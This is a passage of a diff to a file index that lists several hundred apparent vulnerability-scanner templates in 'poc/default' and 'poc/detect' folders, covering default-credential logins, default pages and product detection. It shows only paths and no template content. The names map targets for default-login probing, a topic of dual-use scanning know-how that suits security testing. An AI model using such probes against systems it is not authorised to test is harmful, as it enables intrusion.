./poc/default/default-asp-net-page-6824.yaml ./poc/default/default-asp-net-page-6825.yaml -./poc/default/default-asp-net-page.yaml ./poc/default/default-asp.net-page.yaml ./poc/default/default-centos-test-page-6826.yaml -./poc/default/default-centos-test-page-6827.yaml ./poc/default/default-centos-test-page-6828.yaml ./poc/default/default-centos-test-page-6829.yaml ./poc/default/default-codeigniter-page-6830.yaml @@ -42195,6 +42172,7 @@ ./poc/default/default-config.yaml ./poc/default/default-detect-generic-6837.yaml ./poc/default/default-detect-generic-6838.yaml +./poc/default/default-detect-generic-6839.yaml ./poc/default/default-django-page-6840.yaml ./poc/default/default-django-page-6841.yaml ./poc/default/default-django-page-6842.yaml @@ -42203,10 +42181,11 @@ ./poc/default/default-fastcgi-page-6845.yaml ./poc/default/default-fastcgi-page-6846.yaml ./poc/default/default-fastcgi-page-6847.yaml -./poc/default/default-fedora-page-6848.yaml +./poc/default/default-fastcgi-page.yaml ./poc/default/default-fedora-page-6849.yaml ./poc/default/default-fedora-page-6850.yaml ./poc/default/default-fedora-page-6851.yaml +./poc/default/default-fedora-page.yaml ./poc/default/default-glassfish-server-page-6852.yaml ./poc/default/default-glassfish-server-page-6853.yaml ./poc/default/default-glassfish-server-page-6854.yaml @@ -42228,6 +42207,7 @@ ./poc/default/default-lucee-page-6869.yaml ./poc/default/default-lucee-page-6870.yaml ./poc/default/default-lucee-page-6872.yaml +./poc/default/default-lucee-page.yaml ./poc/default/default-mag-42c8a5445d70abc166f93c14f3500712.yaml ./poc/default/default-mag.yaml ./poc/default/default-matcher-condition.yaml @@ -42235,43 +42215,43 @@ ./poc/default/default-microsoft-azure-page-6874.yaml ./poc/default/default-microsoft-azure-page-6875.yaml ./poc/default/default-microsoft-azure-page-6876.yaml -./poc/default/default-microsoft-azure-page.yaml ./poc/default/default-movable-page-6877.yaml ./poc/default/default-movable-page-6878.yaml ./poc/default/default-movable-page-6879.yaml +./poc/default/default-nginx-page-6880.yaml ./poc/default/default-nginx-page-6881.yaml ./poc/default/default-nginx-page-6882.yaml ./poc/default/default-nginx-page-6883.yaml -./poc/default/default-nginx-page.yaml ./poc/default/default-openresty-6884.yaml ./poc/default/default-openresty-6885.yaml ./poc/default/default-openresty-6886.yaml ./poc/default/default-openresty-6887.yaml ./poc/default/default-openresty-6888.yaml -./poc/default/default-openresty.yaml ./poc/default/default-oracle-application-page-6889.yaml ./poc/default/default-oracle-application-page-6890.yaml ./poc/default/default-oracle-application-page-6891.yaml ./poc/default/default-oracle-application-page-6892.yaml ./poc/default/default-oracle-application-page-6893.yaml +./poc/default/default-oracle-application-page.yaml ./poc/default/default-payara-server-page-6894.yaml ./poc/default/default-payara-server-page-6895.yaml ./poc/default/default-payara-server-page-6896.yaml ./poc/default/default-payara-server-page-6897.yaml +./poc/default/default-payara-server-page.yaml ./poc/default/default-plesk-page-6898.yaml ./poc/default/default-plesk-page-6899.yaml ./poc/default/default-plesk-page-6900.yaml ./poc/default/default-plesk-page-6901.yaml -./poc/default/default-plesk-page.yaml +./poc/default/default-redhat-test-page-6902.yaml ./poc/default/default-redhat-test-page-6903.yaml ./poc/default/default-redhat-test-page-6904.yaml ./poc/default/default-redhat-test-page-6905.yaml ./poc/default/default-sitecore-page.yaml -./poc/default/default-ssltls-test-page-6906.yaml ./poc/default/default-ssltls-test-page-6907.yaml ./poc/default/default-ssltls-test-page-6908.yaml ./poc/default/default-ssltls-test-page-6909.yaml -./poc/default/default-tomcat-page-6910.yaml +./poc/default/default-ssltls-test-page.yaml +./poc/default/default-tomcat-page-6911.yaml ./poc/default/default-tomcat-page.yaml ./poc/default/default-windows-server-page-6912.yaml ./poc/default/default-windows-server-page-6913.yaml @@ -42289,7 +42269,6 @@ ./poc/default/dell-idrac9-default-login-6932.yaml ./poc/default/dell-idrac9-default-login-6933.yaml ./poc/default/dell-idrac9-default-login-6934.yaml -./poc/default/dell-idrac9-default-login-6935.yaml ./poc/default/dell-idrac9-default-password.yaml ./poc/default/dell-remote-power-management-default-login.yaml ./poc/default/digitalrebar-provision-default-login.yaml @@ -42301,18 +42280,16 @@ ./poc/default/druid-default-login-1.yaml ./poc/default/druid-default-login-2.yaml ./poc/default/druid-default-login-7095.yaml -./poc/default/druid-default-login-7096.yaml ./poc/default/druid-default-login-7097.yaml ./poc/default/druid-default-login.yaml ./poc/default/druid-default-password-1.yaml ./poc/default/druid-default-password-2.yaml ./poc/default/dubbo-admin-default-login-7120.yaml -./poc/default/dubbo-admin-default-login-7121.yaml ./poc/default/dubbo-admin-default-password.yaml ./poc/default/dubbo-admin-default-password.yml ./poc/default/dvwa-default-login-7126.yaml ./poc/default/dvwa-default-login-7127.yaml -./poc/default/dvwa-default-login-7129.yaml +./poc/default/dvwa-default-login-7128.yaml ./poc/default/elasticsearch-insecure-default-config.yaml ./poc/default/emcecom-default-login-7211.yaml ./poc/default/emcecom-default-login-7213.yaml @@ -42326,11 +42303,11 @@ ./poc/default/exacqvision-default-login-7275.yaml ./poc/default/exacqvision-default-login-7276.yaml ./poc/default/exacqvision-default-login-7277.yaml +./poc/default/exacqvision-default-login.yaml ./poc/default/exacqvision-default-password.yaml ./poc/default/flir-ax8-default-credentials-7512.yaml ./poc/default/flir-ax8-default-credentials.yaml ./poc/default/flir-default-login-7513.yaml -./poc/default/flir-default-login-7514.yaml ./poc/default/flir-default-login-7515.yaml ./poc/default/flir-default-login-7516.yaml ./poc/default/frp-default-credentials-7555.yaml @@ -42338,18 +42315,19 @@ ./poc/default/frp-default-login-7556.yaml ./poc/default/frp-default-login-7557.yaml ./poc/default/frp-default-login-7558.yaml +./poc/default/frp-default-login-7559.yaml ./poc/default/ftp-default-credentials.yaml ./poc/default/fuelcms-default-login-7571.yaml ./poc/default/fuelcms-default-login-7572.yaml ./poc/default/geoserver-default-login-7593.yaml -./poc/default/geoserver-default-login-7594.yaml +./poc/default/geoserver-default-login.yaml ./poc/default/glpi-default-credential.yaml ./poc/default/glpi-default-login-7731.yaml ./poc/default/glpi-default-login-7732.yaml ./poc/default/glpi-default-login-7733.yaml -./poc/default/glpi-default-login.yaml ./poc/default/gophish-default-login-7792.yaml ./poc/default/gophish-default-login-7793.yaml +./poc/default/gophish-default-login-7794.yaml ./poc/default/grafana-default-credential-1.yaml ./poc/default/grafana-default-credential-2.yaml ./poc/default/grafana-default-credential.yaml @@ -42364,8 +42342,8 @@ ./poc/default/grafana-default-password.yml ./poc/default/graphite-browser-default-credential.yaml ./poc/default/guacamole-default-login-7858.yaml -./poc/default/guacamole-default-login-7859.yaml ./poc/default/guacamole-default-login-7860.yaml +./poc/default/guacamole-default-login-7861.yaml ./poc/default/guacamole-default-login.yaml ./poc/default/hikvision-intercom-service-default-password.yaml ./poc/default/hikvision-intercom-service-default-password.yml @@ -42377,40 +42355,35 @@ ./poc/default/hongdian-default-password-1.yaml ./poc/default/hongdian-default-password-2.yaml ./poc/default/hortonworks-smartsense-default-credentials.yaml -./poc/default/hp-switch-default-login-8035.yaml ./poc/default/hp-switch-default-login-8036.yaml ./poc/default/hp-switch-default-login-8037.yaml -./poc/default/hp-switch-default-login.yaml +./poc/default/hp-switch-default-login-8038.yaml ./poc/default/huawei-HG532e-default-login.yaml ./poc/default/huawei-hg532e-default-router-login-8062.yaml ./poc/default/huawei-hg532e-default-router-login-8063.yaml +./poc/default/huawei-hg532e-default-router-login-8064.yaml ./poc/default/hue-default-credential-8080.yaml ./poc/default/hue-default-credential-8081.yaml -./poc/default/hue-default-credential.yaml ./poc/default/ibm-dcbc-default-login.yaml ./poc/default/ibm-dcec-default-login.yaml ./poc/default/ibm-dsc-default-login.yaml ./poc/default/ibm-hmc-default-login.yaml -./poc/default/ibm-mqseries-default-login-8106.yaml ./poc/default/ibm-mqseries-default-login-8107.yaml -./poc/default/ibm-mqseries-default-login.yaml +./poc/default/ibm-mqseries-default-login-8108.yaml ./poc/default/ibm-storage-default-credential-8123.yaml +./poc/default/ibm-storage-default-credential-8124.yaml ./poc/default/ibm-storage-default-credential-8125.yaml -./poc/default/ibm-storage-default-credential.yaml ./poc/default/ibm-storage-default-password.yaml ./poc/default/idemia-biometrics-default-credentials.yaml ./poc/default/idemia-biometrics-default-login-8138.yaml ./poc/default/idemia-biometrics-default-login-8139.yaml ./poc/default/idemia-biometrics-default-login-8140.yaml -./poc/default/idemia-biometrics-default-login.yaml +./poc/default/idemia-biometrics-default-login-8141.yaml ./poc/default/iis-default-page.yaml ./poc/default/imm-default-login.yaml ./poc/default/inspur-clusterengine-default-login-8162.yaml -./poc/default/inspur-clusterengine-default-login.yaml ./poc/default/iptime-default-login-8192.yaml -./poc/default/iptime-default-login-8193.yaml ./poc/default/iptime-default-login-8194.yaml -./poc/default/iptime-default-login.yaml ./poc/default/jboss-default-password.yaml ./poc/default/jenkins-default-8270.yaml ./poc/default/jenkins-default-8271.yaml @@ -42433,7 +42406,6 @@ ./poc/default/kafka-center-default-login-8415.yaml ./poc/default/kafka-center-default-login-8416.yaml ./poc/default/kafka-center-default-login-8417.yaml -./poc/default/kafka-center-default-login.yaml ./poc/default/kafka-center-default-password.yaml ./poc/default/kingsoft-v8-default-password.yaml ./poc/default/kingsoft-v8-default-password.yml @@ -42443,11 +42415,10 @@ ./poc/default/lighttpd-default.yaml ./poc/default/lutron-iot-default-login-8674.yaml ./poc/default/lutron-iot-default-login-8675.yaml -./poc/default/lutron-iot-default-login-8677.yaml +./poc/default/lutron-iot-default-login-8676.yaml ./poc/default/lutron-iot-default-login-8678.yaml ./poc/default/lutron-iot-default-login.yaml ./poc/default/mantisbt-default-credential-8778.yaml -./poc/default/mantisbt-default-credential.yaml ./poc/default/micro-focus-ucmdb-default-credentials-8843.yaml ./poc/default/micro-focus-ucmdb-default-credentials.yaml ./poc/default/minio-default-login(1).yaml @@ -42468,6 +42439,7 @@ ./poc/default/nacos-default-password.yaml ./poc/default/nagios-default-credential-8989.yaml ./poc/default/nagios-default-credential.yaml +./poc/default/nagios-default-login-8990.yaml ./poc/default/nagios-default-login-8991.yaml ./poc/default/nagios-default-login-8992.yaml ./poc/default/nagios-default-login-8993.yaml @@ -42476,17 +42448,15 @@ ./poc/default/netentsec-icg-default-password.yml ./poc/default/netsus-default-login-9058.yaml ./poc/default/netsus-default-login-9059.yaml -./poc/default/netsus-default-login.yaml +./poc/default/netsus-default-login-9060.yaml ./poc/default/nexus-default-login-9086.yaml ./poc/default/nexus-default-login-9087.yaml ./poc/default/nexus-default-login-9088.yaml ./poc/default/nexus-default-login-9089.yaml -./poc/default/nexus-default-password-9091.yaml ./poc/default/nexus-default-password.yaml ./poc/default/nexus-default-password.yml ./poc/default/nps-default-login-9142.yaml ./poc/default/nps-default-login-9143.yaml -./poc/default/nps-default-login-9144.yaml ./poc/default/nps-default-login-9145.yaml ./poc/default/nps-default-login.yaml ./poc/default/nps-default-password-9147.yaml @@ -42496,13 +42466,13 @@ ./poc/default/nsicg-default-password.yaml ./poc/default/o2-default-password.yaml ./poc/default/octobercms-default-login-9192.yaml -./poc/default/octobercms-default-login.yaml +./poc/default/octobercms-default-login-9193.yaml ./poc/default/ofbiz-default-credentials-9207.yaml ./poc/default/ofbiz-default-credentials.yaml ./poc/default/ofbiz-default-login-9208.yaml ./poc/default/ofbiz-default-login-9209.yaml +./poc/default/ofbiz-default-login-9210.yaml ./poc/default/ofbiz-default-login-9211.yaml -./poc/default/ofbiz-default-login.yaml ./poc/default/ofbiz-default-password.yaml ./poc/default/openemr-default-login-9269.yaml ./poc/default/openemr-default-login-9270.yaml @@ -42513,10 +42483,8 @@ ./poc/default/operations-automation-default-page-9337.yaml ./poc/default/operations-automation-default-page-9339.yaml ./poc/default/operations-automation-default-page-9340.yaml -./poc/default/operations-automation-default-page.yaml ./poc/default/oracle-bi-default-credentials.yaml ./poc/default/panabit-default-login-9437.yaml -./poc/default/panabit-default-login-9438.yaml ./poc/default/panabit-default-login-9439.yaml ./poc/default/panabit-default-login-9440.yaml ./poc/default/panabit-default-password-9441.yaml @@ -42525,18 +42493,16 @@ ./poc/default/panabit-gateway-default-password.yaml ./poc/default/panabit-gateway-default-password.yml ./poc/default/panabit-ixcache-default-login-9443.yaml +./poc/default/panabit-ixcache-default-login.yaml ./poc/default/panabit-ixcache-default-password.yaml ./poc/default/panabit-ixcache-default-password.yml ./poc/default/panos-default-credentials.yaml ./poc/default/panos-default-login-9454.yaml ./poc/default/panos-default-login-9455.yaml ./poc/default/panos-default-login-9456.yaml -./poc/default/panos-default-login.yaml ./poc/default/pentaho-default-login-9477.yaml -./poc/default/pentaho-default-login-9478.yaml ./poc/default/pentaho-default-login-9479.yaml ./poc/default/pentaho-default-login-9480.yaml -./poc/default/pentaho-default-login.yaml ./poc/default/peoplesoft-default-login.yaml ./poc/default/phpmyadmin-default-login-extended.yaml ./poc/default/phpmyadmin-default-page.yaml @@ -42552,13 +42518,14 @@ ./poc/default/rabbitmq-default-password.yaml ./poc/default/rabbitmq-default-password.yml ./poc/default/rainloop-default-login-9811.yaml +./poc/default/rainloop-default-login-9812.yaml ./poc/default/rainloop-default-login-9813.yaml ./poc/default/rancher-default-login-9814.yaml ./poc/default/rancher-default-login-9815.yaml ./poc/default/rancher-default-login-9816.yaml -./poc/default/rancher-default-login.yaml ./poc/default/rancher-default-password.yaml -./poc/default/ranger-default-login.yaml +./poc/default/ranger-default-login-9827.yaml +./poc/default/ranger-default-login-9828.yaml ./poc/default/redfish-bmc-default-login.yaml ./poc/default/redis-default-logins.yaml ./poc/default/rockmongo-default-credentials-9896.yaml @@ -42582,7 +42549,6 @@ ./poc/default/samsung-wlan-default-login-10016.yaml ./poc/default/samsung-wlan-default-login-10017.yaml ./poc/default/samsung-wlan-default-login-10018.yaml -./poc/default/samsung-wlan-default-login.yaml ./poc/default/secnet-ac-default-login-10113.yaml ./poc/default/secnet-ac-default-login.yaml ./poc/default/secnet-ac-default-password.yaml @@ -42631,13 +42597,13 @@ ./poc/default/superset-default-login-10574.yaml ./poc/default/superset-default-login.yaml ./poc/default/szhe-default-login-10635.yaml +./poc/default/szhe-default-login-10636.yaml ./poc/default/szhe-default-login-10637.yaml ./poc/default/szhe-default-login-10638.yaml ./poc/default/szhe-default-password-10639.yaml ./poc/default/szhe-default-password-10640.yaml ./poc/default/szhe-default-password.yaml ./poc/default/telecom-gateway-default-login-10686.yaml -./poc/default/telecom-gateway-default-login.yaml ./poc/default/telecom-gateway-default-password.yaml ./poc/default/telecom-gateway-default-password.yml ./poc/default/tingsboard-default-login.yaml @@ -42645,7 +42611,6 @@ ./poc/default/tomcat-default-login-10789.yaml ./poc/default/tomcat-default-login-10790.yaml ./poc/default/tomcat-default-login-10791.yaml -./poc/default/tomcat-default-login.yaml ./poc/default/tomcat-default-manager.yaml ./poc/default/tomcat-manager-default-1.yaml ./poc/default/tomcat-manager-default-10.yaml @@ -42675,6 +42640,7 @@ ./poc/default/ucmdb-default-login-10868.yaml ./poc/default/ucmdb-default-login-10869.yaml ./poc/default/ucmdb-default-login-10870.yaml +./poc/default/ucmdb-default-login-10871.yaml ./poc/default/utt-default-password.yaml ./poc/default/versa-default-login-11002.yaml ./poc/default/versa-default-login-11003.yaml @@ -42682,12 +42648,13 @@ ./poc/default/versa-default-password.yaml ./poc/default/versa-flexvnf-ui-default-login.yaml ./poc/default/vidyo-default-login-11008.yaml -./poc/default/vidyo-default-login-11009.yaml ./poc/default/vidyo-default-login-11010.yaml ./poc/default/visionhub-default-credentials.yaml ./poc/default/visionhub-default-login-11026.yaml ./poc/default/visionhub-default-login-11027.yaml ./poc/default/visionhub-default-login-11028.yaml +./poc/default/visionhub-default-login-11029.yaml +./poc/default/visionhub-default-login.yaml ./poc/default/wanhu-ezoffice-defaultroot-evointerfaceservlet-infoleak.yaml ./poc/default/wanhu-ezoffice-defaultroot-officeserverservlet-fileupload.yaml ./poc/default/wanhuOA-default-login.yaml @@ -42698,12 +42665,13 @@ ./poc/default/wifisky-default-login-11201.yaml ./poc/default/wifisky-default-login-11203.yaml ./poc/default/wifisky-default-login-11204.yaml -./poc/default/wifisky-default-password-11205.yaml +./poc/default/wifisky-default-login.yaml ./poc/default/wifisky-default-password-11206.yaml ./poc/default/wifisky-default-password-cnvd-2021-39012.yml ./poc/default/wifisky-default-password.yaml ./poc/default/wp-default-feature-image-77ca0fafb755e10a5f728cc189fc877a.yaml ./poc/default/wp-default-feature-image.yaml +./poc/default/wso2-default-login-11640.yaml ./poc/default/wso2-default-login-11641.yaml ./poc/default/wso2-default-login-11642.yaml ./poc/default/wso2-default-login-11643.yaml @@ -42711,9 +42679,10 @@ ./poc/default/xampp-default-page-11660.yaml ./poc/default/xampp-default-page-11661.yaml ./poc/default/xampp-default-page-11662.yaml -./poc/default/xampp-default-page-11663.yaml +./poc/default/xampp-default-page.yaml ./poc/default/xerox-workcentre7-default-password.yaml ./poc/default/xerox7-default-login-11678.yaml +./poc/default/xerox7-default-login-11679.yaml ./poc/default/xerox7-default-login-11680.yaml ./poc/default/xerox7-default-password.yaml ./poc/default/xxljob-default-login-11709.yaml @@ -42722,21 +42691,20 @@ ./poc/default/xxljob-default-login-11712.yaml ./poc/default/xxljob-default-login-11713.yaml ./poc/default/xxljob-default-login-11714.yaml +./poc/default/xxljob-default-login.yaml ./poc/default/zabbix-default-credentials-11758.yaml ./poc/default/zabbix-default-credentials-11759.yaml ./poc/default/zabbix-default-credentials.yaml ./poc/default/zabbix-default-login-11760.yaml ./poc/default/zabbix-default-login-11761.yaml -./poc/default/zabbix-default-login-11763.yaml +./poc/default/zabbix-default-login-11762.yaml ./poc/default/zabbix-default-login.yaml ./poc/default/zabbix-default-password.yaml ./poc/default/zabbix-default-password.yml ./poc/default/zmanda-default-credential.yaml -./poc/default/zmanda-default-login-11825.yaml ./poc/default/zmanda-default-login-11826.yaml ./poc/default/zmanda-default-login-11827.yaml ./poc/default/zmanda-default-login-11828.yaml -./poc/default/zmanda-default-login.yaml ./poc/detect/4D-detect.yaml ./poc/detect/AWS-S3-Bucket-Detect.yaml ./poc/detect/Biometric-detect.yaml @@ -42745,6 +42713,7 @@ ./poc/detect/achecker-detect.yaml ./poc/detect/acontent-detect-31.yaml ./poc/detect/acontent-detect-32.yaml +./poc/detect/acontent-detect-33.yaml ./poc/detect/activemq-openwire-transport-detect.yaml ./poc/detect/ad-blocking-detector-29a2fe62a95c9b7d06f91cd4f479a678.yaml ./poc/detect/ad-blocking-detector.yaml @@ -42761,9 +42730,8 @@ ./poc/detect/adobe-coldfusion-detect-4.yaml ./poc/detect/adobe-coldfusion-detect-5.yaml ./poc/detect/adobe-coldfusion-detect-6.yaml -./poc/detect/adobe-coldfusion-detect-82.yaml +./poc/detect/adobe-coldfusion-detect-83.yaml ./poc/detect/adobe-coldfusion-detect-84.yaml -./poc/detect/adobe-coldfusion-detect.yaml ./poc/detect/adobe-coldfusion-detector-1.yaml ./poc/detect/adobe-coldfusion-detector-2.yaml ./poc/detect/adobe-coldfusion-detector-3.yaml @@ -42781,10 +42749,9 @@ ./poc/detect/aem-detection.yaml ./poc/detect/airflow-detect-237.yaml ./poc/detect/airflow-detect-238.yaml -./poc/detect/airflow-detect-239.yaml -./poc/detect/airflow-detect.yaml +./poc/detect/airflow-detect-240.yaml ./poc/detect/alfresco-detect-258.yaml -./poc/detect/alfresco-detect-260.yaml +./poc/detect/alfresco-detect-259.yaml ./poc/detect/alfresco-detect.yaml ./poc/detect/amazon-mws-auth-token-detect.yaml ./poc/detect/amazon-sns-topic-disclosure-detect.yaml @@ -42794,8 +42761,7 @@ ./poc/detect/apache-axis-detect-3.yaml ./poc/detect/apache-axis-detect-339.yaml ./poc/detect/apache-axis-detect-340.yaml -./poc/detect/apache-axis-detect-341.yaml -./poc/detect/apache-cocoon-detect-342.yaml +./poc/detect/apache-cocoon-detect.yaml ./poc/detect/apache-detect-345.yaml ./poc/detect/apache-detect-346.yaml ./poc/detect/apache-detect-347.yaml @@ -42808,9 +42774,9 @@ ./poc/detect/aptus-detect.yaml ./poc/detect/argocd-detect.yaml ./poc/detect/arris-modem-detect.yaml +./poc/detect/artica-web-proxy-detect-543.yaml ./poc/detect/artica-web-proxy-detect-544.yaml ./poc/detect/artica-web-proxy-detect-546.yaml -./poc/detect/artica-web-proxy-detect.yaml ./poc/detect/artifactory-version-detect.yaml ./poc/detect/aspnet-version-detect.yaml ./poc/detect/atlantis-detect.yaml @@ -42819,12 +42785,11 @@ ./poc/detect/autobahn-python-detect-592.yaml ./poc/detect/autobahn-python-detect-593.yaml ./poc/detect/autobahn-python-detect-594.yaml -./poc/detect/autobahn-python-detect-595.yaml +./poc/detect/autobahn-python-detect.yaml ./poc/detect/autoset-detect.yaml ./poc/detect/avantfax-detect-599.yaml ./poc/detect/avantfax-detect-600.yaml ./poc/detect/avantfax-detect.yaml -./poc/detect/aviatrix-detect-606.yaml ./poc/detect/aviatrix-detect-607.yaml ./poc/detect/aviatrix-detect.yaml ./poc/detect/aws-elastic-beanstalk-detect-642.yaml @@ -42836,6 +42801,7 @@ ./poc/detect/axis2-detect.yaml ./poc/detect/azure-takeover-detection-681.yaml ./poc/detect/azure-takeover-detection-682.yaml +./poc/detect/azure-takeover-detection-683.yaml ./poc/detect/azure-takeover-detection.yaml ./poc/detect/basic-auth-detect.yaml ./poc/detect/basic-auth-detection-688.yaml @@ -42853,11 +42819,10 @@ ./poc/detect/bigip-config-utility-detect-3.yaml ./poc/detect/bigip-config-utility-detect-730.yaml ./poc/detect/bigip-config-utility-detect-731.yaml -./poc/detect/bigip-config-utility-detect-733.yaml ./poc/detect/bigip-config-utility-detect.yaml ./poc/detect/bigip-detection-734.yaml ./poc/detect/bigip-detection.yaml -./poc/detect/biometric-detect-737.yaml +./poc/detect/biometric-detect-736.yaml ./poc/detect/biometric-detect.yaml ./poc/detect/birt-detect.yaml ./poc/detect/bmc-panel-detect.yaml @@ -42872,23 +42837,22 @@ ./poc/detect/brother-printer-detect-789.yaml ./poc/detect/brother-printer-detect-790.yaml ./poc/detect/brother-printer-detect.yaml -./poc/detect/burp-api-detect-809.yaml ./poc/detect/burp-api-detect-810.yaml -./poc/detect/burp-api-detect-811.yaml ./poc/detect/burp-api-detect-812.yaml ./poc/detect/burp-api-detect-813.yaml +./poc/detect/burp-api-detect.yaml ./poc/detect/cacti-detect-1.yaml ./poc/detect/cacti-detect-2.yaml -./poc/detect/cacti-detect-826.yaml ./poc/detect/cacti-detect.yaml ./poc/detect/carestream-vue-detect-1.yaml ./poc/detect/carestream-vue-detect-2.yaml ./poc/detect/carestream-vue-detect-859.yaml ./poc/detect/carestream-vue-detect-860.yaml -./poc/detect/carestream-vue-detect.yaml +./poc/detect/carestream-vue-detect-861.yaml ./poc/detect/ccm-detect.yaml ./poc/detect/centreon-detect-875.yaml ./poc/detect/centreon-detect-876.yaml +./poc/detect/centreon-detect-877.yaml ./poc/detect/centreon-detect.yaml ./poc/detect/changedetection-panel.yaml ./poc/detect/chatgpt-next-detection.yaml @@ -42905,8 +42869,6 @@ ./poc/detect/cisco-webvpn-detect.yaml ./poc/detect/citrix-adc-gateway-detect-1.yaml ./poc/detect/citrix-adc-gateway-detect-2.yaml -./poc/detect/citrix-adc-gateway-detect-981.yaml -./poc/detect/citrix-adc-gateway-detect-982.yaml ./poc/detect/citrix-adc-gateway-detect-983.yaml ./poc/detect/citrix-adc-gateway-detect.yaml ./poc/detect/citrix-honeypot-detection.yaml @@ -42920,27 +42882,26 @@ ./poc/detect/clickjacking-detection-registration.yaml ./poc/detect/cms-detect.yaml ./poc/detect/cname-service-detection.yaml -./poc/detect/cname-service-detector-1034.yaml ./poc/detect/cname-service-detector.yaml ./poc/detect/cobbler-version-detect.yaml ./poc/detect/cockpit-detect-1125.yaml -./poc/detect/cockpit-detect-1127.yaml ./poc/detect/cockpit-detect-1128.yaml +./poc/detect/cockpit-detect.yaml ./poc/detect/cofense-vision-detection.yaml ./poc/detect/colasoft-network-information-comprehensive-detection-and-processing-platform.yaml ./poc/detect/compalex-panel-detect.yaml ./poc/detect/comprehensive-swagger-ui-version-detection.yaml ./poc/detect/confluence-detect-1.yaml ./poc/detect/confluence-detect-1186.yaml -./poc/detect/confluence-detect-1188.yaml +./poc/detect/confluence-detect-1187.yaml ./poc/detect/confluence-detect-1189.yaml ./poc/detect/confluence-detect-2.yaml ./poc/detect/confluence-detect-3.yaml ./poc/detect/confluence-detect-4.yaml ./poc/detect/confluence-detect.yaml ./poc/detect/conpot-siemens-honeypot-detection.yaml -./poc/detect/contentkeeper-detect-1201.yaml ./poc/detect/contentkeeper-detect-1202.yaml +./poc/detect/contentkeeper-detect-1203.yaml ./poc/detect/contentkeeper-detect.yaml ./poc/detect/couchdb-detect.yaml ./poc/detect/cowrie-honeypot-detect.yaml @@ -42951,10 +42912,11 @@ ./poc/detect/craft-cms-detect-1247.yaml ./poc/detect/craft-cms-detect-1248.yaml ./poc/detect/crush-ftp-detect-1270.yaml +./poc/detect/crush-ftp-detect-1271.yaml ./poc/detect/crush-ftp-detect-1272.yaml ./poc/detect/crush-ftp-detect.yaml +./poc/detect/csrfguard-detect-1290.yaml ./poc/detect/csrfguard-detect-1291.yaml -./poc/detect/csrfguard-detect.yaml ./poc/detect/ctcms-detect.yaml ./poc/detect/custom-aem-ACPV-detect.yaml ./poc/detect/custom-api-server-detect.yaml @@ -42963,6 +42925,7 @@ ./poc/detect/custom-connection-server-detect.yaml ./poc/detect/custom-ctc-panel-detect.yaml ./poc/detect/custom-data-alert-engine-service-detect.yaml +./poc/detect/custom-data-result-service-detect.yaml ./poc/detect/custom-datadump-source-code-detect.yaml ./poc/detect/custom-dom-xss-detect.yaml ./poc/detect/custom-dot-git-detect.yaml @@ -42989,12 +42952,14 @@ ./poc/detect/darkstat-detect-2.yaml ./poc/detect/darkstat-detect-6767.yaml ./poc/detect/darkstat-detect.yaml +./poc/detect/daybyday-detect-6772.yaml ./poc/detect/daybyday-detect-6773.yaml ./poc/detect/daybyday-detect.yaml ./poc/detect/deep-link-detect.yaml ./poc/detect/defaced-website-detect.yaml ./poc/detect/default-detect-generic-6837.yaml ./poc/detect/default-detect-generic-6838.yaml +./poc/detect/default-detect-generic-6839.yaml ./poc/detect/dell-bmc-panel-detect.yaml ./poc/detect/dell-idrac6-detect-6918.yaml ./poc/detect/dell-idrac6-detect-6919.yaml @@ -43004,27 +42969,25 @@ ./poc/detect/dell-idrac7-detect-6923.yaml ./poc/detect/dell-idrac7-detect-6924.yaml ./poc/detect/dell-idrac7-detect-6925.yaml -./poc/detect/dell-idrac7-detect.yaml ./poc/detect/dell-idrac8-detect-6927.yaml ./poc/detect/dell-idrac8-detect-6928.yaml ./poc/detect/dell-idrac8-detect-6929.yaml ./poc/detect/dell-idrac8-detect.yaml ./poc/detect/dell-idrac9-detect-6936.yaml ./poc/detect/dell-idrac9-detect-6937.yaml -./poc/detect/dell-idrac9-detect-6938.yaml ./poc/detect/dell-idrac9-detect-6940.yaml ./poc/detect/dell-idrac9-detect-6941.yaml ./poc/detect/dell-remote-power-management-detect.yaml ./poc/detect/deprecated-sshv1-detection.yaml +./poc/detect/detect-addpac-voip-gateway-6963.yaml ./poc/detect/detect-addpac-voip-gateway-6964.yaml ./poc/detect/detect-addpac-voip-gateway-6965.yaml -./poc/detect/detect-addpac-voip-gateway.yaml ./poc/detect/detect-all-takeover.yaml ./poc/detect/detect-all-takeovers.yaml ./poc/detect/detect-all-takovers.yaml ./poc/detect/detect-dangling-cname-6966.yaml -./poc/detect/detect-dangling-cname-6967.yaml ./poc/detect/detect-dangling-cname-6968.yaml +./poc/detect/detect-dns-over-https-6969.yaml ./poc/detect/detect-dns-over-https.yaml ./poc/detect/detect-drone-config-6971.yaml ./poc/detect/detect-drone-config-6972.yaml @@ -43033,17 +42996,17 @@ ./poc/detect/detect-generic-website.yaml ./poc/detect/detect-jabber-xmpp-6974.yaml ./poc/detect/detect-jabber-xmpp-6975.yaml -./poc/detect/detect-jabber-xmpp.yaml -./poc/detect/detect-options-method-6977.yaml +./poc/detect/detect-options-method-6978.yaml ./poc/detect/detect-options-method.yaml ./poc/detect/detect-rsyncd-6979.yaml ./poc/detect/detect-rsyncd-6980.yaml ./poc/detect/detect-rsyncd-6981.yaml -./poc/detect/detect-rsyncd-6982.yaml ./poc/detect/detect-rsyncd.yaml ./poc/detect/detect-sentry-6983.yaml +./poc/detect/detect-sentry-6984.yaml ./poc/detect/detect-sentry-6985.yaml ./poc/detect/detect-sentry-6986.yaml +./poc/detect/detect-sentry.yaml ./poc/detect/detect-springboot-actuator.yaml ./poc/detect/detect-ssl-issuer.yaml ./poc/detect/detect-tracer-sc-web.yaml @@ -43059,6 +43022,7 @@ ./poc/detect/dionaea-smb-honeypot-detection.yaml ./poc/detect/django-debug-detect-7024.yaml ./poc/detect/django-debug-detect-7025.yaml +./poc/detect/django-debug-detect-7026.yaml ./poc/detect/django-debug-detect-7027.yaml ./poc/detect/django-debug-detect.yaml ./poc/detect/dns-saas-service-detection.yaml @@ -43068,24 +43032,26 @@ ./poc/detect/dns-waf-detect.yaml ./poc/detect/dnssec-detection.yaml ./poc/detect/docker-api-detection.yaml +./poc/detect/dolibarr-detect-7069.yaml ./poc/detect/dolibarr-detect-7070.yaml ./poc/detect/dolibarr-detect-7071.yaml ./poc/detect/dolibarr-detect.yaml ./poc/detect/dotclear-detect-2.yaml ./poc/detect/dotclear-detect-7082.yaml ./poc/detect/dotclear-detect-7083.yaml +./poc/detect/dotclear-detect-7084.yaml ./poc/detect/dotclear-detect.yaml ./poc/detect/dotcms-version-detect.yaml ./poc/detect/dotnet-remoting-service-detect.yaml ./poc/detect/druid-detect-7099.yaml ./poc/detect/druid-detect.yaml ./poc/detect/dwr-index-detect-7135.yaml 